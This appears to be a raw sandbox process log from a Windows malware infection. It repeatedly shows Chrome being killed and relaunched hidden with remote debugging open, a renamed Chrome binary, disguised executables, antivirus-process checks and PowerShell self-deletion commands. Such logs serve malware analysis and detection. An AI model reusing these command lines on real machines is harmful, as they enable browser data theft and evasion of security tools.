"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5772 -ip 5772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 1312

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Users\Admin\Desktop\Files\2.exe

"C:\Users\Admin\Desktop\Files\2.exe"

C:\Users\Admin\Desktop\Files\t.exe

"C:\Users\Admin\Desktop\Files\t.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5908 -ip 5908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 444

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\AppData\Local\Temp\1014487001\81c18992ca.exe

"C:\Users\Admin\AppData\Local\Temp\1014487001\81c18992ca.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\Desktop\Files\XClient.exe

"C:\Users\Admin\Desktop\Files\XClient.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

